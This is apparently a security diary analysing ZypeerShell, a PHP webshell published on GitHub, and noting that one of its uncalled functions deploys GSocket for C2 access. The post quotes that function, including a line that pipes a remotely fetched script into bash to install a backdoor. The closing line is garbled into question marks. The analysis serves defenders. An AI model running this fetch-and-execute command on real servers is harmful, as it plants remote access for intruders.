Webshells Remain Popular

Published: 2026-06-22. Last Updated: 2026-06-22 14:10:27 UTC
by Xavier Mertens (Version: 1)

Webshells have been popular for a long time. We already covered this topic across multiple diaries[1][2]. I spent some time to track them[3] and slighly paid less attention to them but today I found another one. It seems to be a new player (pushed on Github two months ago).

The webshell is called ZypeerShell[4] and pretend to be "The most powerful, undetectable, and feature-rich PHP webshell available on GitHub.". The shell is classic and provides most of the expected features for such tool:

I won't review all the features because they are classic. In the webshell version I found, some functions were present but never called from the GUI. By example, the function zypeergsdeploy() helps to connect to a C2 server through GSocket

function zypeergsdeploy() {
    zypeerhead();

    echo '<div class="header"><center><p><div class="txtfont_header">| GSocket Deploy Tool |</div></p></center><br>';

    echo '<div style="text-align:center;max-width:800px;margin:20px auto;color:#ccc;">';
    echo 'This tool runs the official GSocket installation command:<br>';
    echo '<code style="background:#222;padding:8px 12px;font-size:15px;">bash -c "$(curl -fsSL https://gsocket.io/y)"</code><br><br>';
    echo 'After installation, it will show a secret token and connection command (like gs-netcat -s "XXXX" -i).<br>';
    echo 'Click "Run" below to execute it directly.';
    echo '</div><br><hr><br>';

    if (!isset($_POST['zypeer3']) || $_POST['zypeer3'] !== '>>') {
    [...]

This function is never called!

Note that the Github repository contains a version obfusctated with Fortress Layer, a multi-layer loader with integrity checks. Zypeer is also referenced as a red-team tool on a Telegram channel:

???????